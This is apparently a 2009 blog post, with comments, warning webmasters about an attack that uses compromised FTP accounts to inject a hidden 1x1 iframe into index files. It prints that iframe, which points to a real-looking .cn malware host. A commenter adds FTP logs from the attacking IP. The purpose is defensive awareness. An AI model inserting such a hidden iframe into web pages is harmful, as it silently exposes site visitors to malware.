http://x-betstarwager-x.cn/in.cgi?cocacola87 - iframe wreaking havoc
A new hack/virus/trojan/mallware/whatever is hitting sites across the net quickly.
Not sure what it exactly does, and don’t really care. 
All I know is it is a PITA (pain in the a..)
Basically what appears to be happening is the hack is gaining access via FTP to the root directory of web servers and modifying the index.php file to include the following iframe:
iframe src=”http://x-betstarwager-x.cn/in.cgi?cocacola87″ width=1 height=1 style=”visibility: hidden”/iframe
Feel free to post a response if you know anything more about this. My knowledge is limited on it, but know it’s hitting a lot of sites and just started in the very recent past.
In the meantime, if you have FTP access to your own web sites I would recommend a thorough scan of your own PC because it is possible the trojan is gaining access through your connection.
Comments
just spotted this on a client site.
looks like an FTP “attack”, here are entries from my log files (changed username):
202.160.120.90 USERACCOUNT [05/Mar/2009:11:09:00 +0000] “RETR index.html” 226 218
202.160.120.90 USERACCOUNT [05/Mar/2009:11:09:04 +0000] “STOR index.html” 226 326
202.160.120.90 USERACCOUNT [05/Mar/2009:11:09:19 +0000] “RETR index.php” 226 3900
202.160.120.90 USERACCOUNT [05/Mar/2009:11:09:23 +0000] “STOR index.php” 226 4008
202.160.120.90 USERACCOUNT [05/Mar/2009:11:09:31 +0000] “RETR index.php” 226 7101
202.160.120.90 USERACCOUNT [05/Mar/2009:11:09:35 +0000] “STOR index.php” 226 7209
202.160.120.90 USERACCOUNT [05/Mar/2009:11:10:14 +0000] “RETR index.php” 226 3495
202.160.120.90 USERACCOUNT [05/Mar/2009:11:10:17 +0000] “STOR index.php” 226 3629
I’m grepping my entire web directory just to be safe.
I’ve seen similar attacks. Looks like compromised FTP account access, with a script that finds index.html/php/etc files and updates them with the iframe.
Leave a Comment